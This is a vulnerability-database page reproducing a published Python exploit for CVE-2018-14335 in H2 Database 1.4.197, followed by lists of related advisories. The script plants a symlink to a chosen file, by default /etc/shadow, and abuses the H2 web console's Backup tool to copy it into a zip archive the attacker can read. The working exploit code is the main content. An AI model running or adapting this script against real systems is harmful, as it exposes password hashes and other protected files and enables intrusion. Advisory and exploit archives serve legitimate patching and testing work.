Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormOwodeltaPACKETSTORM:148745
HistoryJul 30, 2018 - 12:00 a.m.

H2 Database 1.4.197 Information Disclosure

2018-07-3000:00:00
owodelta
packetstormsecurity.com
39

EPSS

0.017

Percentile

88.0%

JSON
`# Exploit Title: H2 Database 1.4.197 - Information Disclosure  
# Date: 2018-07-16  
# Exploit Author: owodelta  
# Vendor Homepage: www.h2database.com  
# Software Link: http://www.h2database.com/html/download.html  
# Version: all versions  
# Tested on: Linux  
# CVE : CVE-2018-14335  
  
# Description: Insecure handling of permissions in the backup function allows  
# attackers to read sensitive files (outside of their permissions) via a  
# symlink to a fake database file.  
  
# PS, thanks to HTB and our team FallenAngels  
  
#!/usr/bin/python  
  
import requests  
import argparse  
import os  
import random  
  
def cleanup(wdir):  
cmd = "rm {}symlink.trace.db".format(wdir)  
os.system(cmd)  
  
def create_symlink(file, wdir):  
cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)  
os.system(cmd)  
  
  
def trigger_symlink(host, wdir):  
outputName = str(random.randint(1000,10000))+".zip"  
#get cookie  
url = 'http://{}'.format(host)  
r = requests.get(url)  
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')  
url = '{}/{}'.format(url,path)  
payload = {  
"tool":"Backup",  
"args":"-file,"+wdir+outputName+",-dir,"+wdir}  
#print url  
requests.post(url,data=payload).text  
print "File is zipped in: "+wdir+outputName  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser()  
required = parser.add_argument_group('required arguments')  
required.add_argument("-H",  
"--host",  
metavar='127.0.0.1:8082',  
help="Target host",  
required=True)  
required.add_argument("-D",  
"--dir",  
metavar="/tmp/",  
default="/tmp/",  
help="Writable directory")  
required.add_argument("-F",  
"--file",  
metavar="/etc/shadow",  
default="/etc/shadow",  
help="Desired file to read",)  
args = parser.parse_args()  
  
create_symlink(args.file,args.dir)  
trigger_symlink(args.host,args.dir)  
cleanup(args.dir)  
  
`

Related

ubuntucve 1
osv 1
exploitpack 1
nvd 1
prion 1
zdt 1
redhatcve 1
exploitdb 1
broadcom 1
veracode 1
cvelist 1
cve 1
vulnrichment 1
ibm 1
redhat 1
ubuntucve
ubuntucve
CVE-2018-14335
2018-07-24 00:00:00
osv
osv
CVE-2018-14335
2018-07-24 13:29:00
exploitpack
exploitpack
H2 Database 1.4.197 - Information Disclosure
2018-07-30 00:00:00
nvd
nvd
CVE-2018-14335
2018-07-24 13:29:00
prion
prion
Design/Logic Flaw
2018-07-24 13:29:00
zdt
zdt
H2 Database 1.4.197 - Information Disclosure Exploit
2018-07-30 00:00:00
redhatcve
redhatcve
CVE-2018-14335
2018-08-01 14:49:45
exploitdb
exploitdb
H2 Database 1.4.197 - Information Disclosure
2018-07-30 00:00:00
broadcom
broadcom
BSA-2022-1837
2022-05-03 00:00:00
veracode
veracode
Information Disclosure
2018-07-25 05:26:31
cvelist
cvelist
CVE-2018-14335
2018-07-24 13:00:00
cve
cve
CVE-2018-14335
2018-07-24 13:29:00
vulnrichment
vulnrichment
CVE-2018-14335
2018-07-24 13:00:00
ibm
ibm
Security Bulletin: H2 Database Vulnerabilities Affect IBM Control Center (CVE-2018-10054, CVE-2018-14335)
2021-05-14 21:25:45
redhat
redhat
(RHSA-2020:0727) Important: Red Hat Data Grid 7.3.3 security update
2020-03-05 12:46:52

EPSS

0.017

Percentile

88.0%

JSON
Related for PACKETSTORM:148745
ubuntucve1osv1exploitpack1nvd1prion1zdt1redhatcve1exploitdb1broadcom1veracode1cvelist1cve1vulnrichment1ibm1redhat1